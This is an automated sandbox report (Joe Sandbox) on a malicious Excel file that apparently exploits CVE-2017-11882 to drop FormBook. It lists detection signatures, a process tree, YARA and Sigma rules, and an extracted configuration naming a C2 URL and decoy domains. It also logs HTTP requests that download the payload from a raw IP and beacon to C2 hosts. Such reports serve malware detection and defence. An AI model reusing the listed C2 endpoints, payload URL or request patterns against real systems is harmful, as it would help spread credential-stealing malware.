Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO5594.xlsx

Overview

General Information

Sample Name:PO5594.xlsx
Analysis ID:513501
MD5:ae8569edde3fe5d5e50f9669bbba54b0
SHA1:fa19e75584925894b781bcdb1dc53c6b024f7b08
SHA256:eceeb9918530b8ab023a2465bacc9c2e572c7aaa7add05df882e49c28fbe6e5b
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2124 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2580 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2856 cmdline: 'C:\Users\Public\vbc.exe' MD5: 11CBFA99FB5EBE8C09674E79B9834D96)
      • vbc.exe (PID: 1868 cmdline: 'C:\Users\Public\vbc.exe' MD5: 11CBFA99FB5EBE8C09674E79B9834D96)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2076 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2036 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.passionfruitny.com/ddzw/"], "decoy": ["azshalomcenter.com", "yumoo.design", "21pk.net", "zhauggim.xyz", "hoikhoinghiep.com", "1207rossmoyne.com", "izophoto.com", "spacex-live.net", "taskstudiox.com", "educationalsurprises.com", "5151vip16.com", "sarahannsartstudio.com", "indousmedicalscribing.com", "crossatlanticb.com", "codemnodum.com", "tvfret-america.online", "romualdoandrade.com", "creativeartsfilmacademy.club", "htsfrance.com", "bentonvilleartists.com", "reactivephysiorehab.com", "kencanatactical.com", "baycsolana.art", "komotoy.com", "metanetgateway.com", "daimondsofa.com", "cheese-box.online", "oeepa4a3bs.com", "consept-cafe.com", "thethomasgrouphomes.com", "marwatown.com", "daliborkamen.com", "taicholdingglobal.com", "palisadesstore.com", "adventuretravelsworld.com", "hamdykamal.net", "high-clicks3.com", "livebongdatv.com", "fiverrbetaa.xyz", "wardrobewish.com", "modsforcars.com", "schittstore.com", "toptanisimlik.com", "exteches.com", "kgkkristalljewels.com", "hpwdz.com", "talkaditown.com", "maininger.com", "preventgomohb.xyz", "juliamoranmartin.com", "flashpointyouth.com", "glenelg.store", "1courchevel.com", "snikido.com", "mikespotts.com", "memorylanecollections.com", "sportherd.com", "lesmariagesdesophie.com", "mammutphilippines.com", "shleppersmovingandstorage.com", "ervinowines.com", "kuwaitschoolsgame.com", "empiredigituseriness.com", "jyh8886.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.0.vbc.exe.400000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.vbc.exe.400000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.vbc.exe.400000.5.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 27 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.232.53.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2580, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.passionfruitny.com/ddzw/"], "decoy": ["azshalomcenter.com", "yumoo.design", "21pk.net", "zhauggim.xyz", "hoikhoinghiep.com", "1207rossmoyne.com", "izophoto.com", "spacex-live.net", "taskstudiox.com", "educationalsurprises.com", "5151vip16.com", "sarahannsartstudio.com", "indousmedicalscribing.com", "crossatlanticb.com", "codemnodum.com", "tvfret-america.online", "romualdoandrade.com", "creativeartsfilmacademy.club", "htsfrance.com", "bentonvilleartists.com", "reactivephysiorehab.com", "kencanatactical.com", "baycsolana.art", "komotoy.com", "metanetgateway.com", "daimondsofa.com", "cheese-box.online", "oeepa4a3bs.com", "consept-cafe.com", "thethomasgrouphomes.com", "marwatown.com", "daliborkamen.com", "taicholdingglobal.com", "palisadesstore.com", "adventuretravelsworld.com", "hamdykamal.net", "high-clicks3.com", "livebongdatv.com", "fiverrbetaa.xyz", "wardrobewish.com", "modsforcars.com", "schittstore.com", "toptanisimlik.com", "exteches.com", "kgkkristalljewels.com", "hpwdz.com", "talkaditown.com", "maininger.com", "preventgomohb.xyz", "juliamoranmartin.com", "flashpointyouth.com", "glenelg.store", "1courchevel.com", "snikido.com", "mikespotts.com", "memorylanecollections.com", "sportherd.com", "lesmariagesdesophie.com", "mammutphilippines.com", "shleppersmovingandstorage.com", "ervinowines.com", "kuwaitschoolsgame.com", "empiredigituseriness.com", "jyh8886.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO5594.xlsxVirustotal: Detection: 32%Perma Link
          Source: PO5594.xlsxReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 5.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.NETSTAT.EXE.4119a0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.4.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.2f90000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.NETSTAT.EXE.27e796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.507848304.00000000004C9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E93 FindFirstFileA,FindClose,4_2_00405E93
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054BD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
          Source: global trafficDNS query: name: www.spacex-live.net
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_2_00406AB5
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_00415680
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_1_00415680
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_1_00406AB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi7_2_00095680
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx7_2_00086AB5
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.232.53.25:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.232.53.25:80

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.spacex-live.net
          Source: C:\Windows\explorer.exeDomain query: www.schittstore.com
          Source: C:\Windows\explorer.exeDomain query: www.metanetgateway.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.29.132.90 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.75.173 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.60.5 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.231 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sarahannsartstudio.com
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.passionfruitny.com/ddzw/
          Source: Joe Sandbox ViewASN Name: AIMS-MY-NETAIMSDataCentreSdnBhdMY AIMS-MY-NETAIMSDataCentreSdnBhdMY
          Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.spacex-live.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.schittstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.metanetgateway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.sarahannsartstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Nov 2021 08:27:00 GMTServer: Apache/2.4.49 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Tue, 02 Nov 2021 03:24:30 GMTETag: "47758-5cfc5d4e71e00"Accept-Ranges: bytesContent-Length: 292696Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /8880/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.232.53.25Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
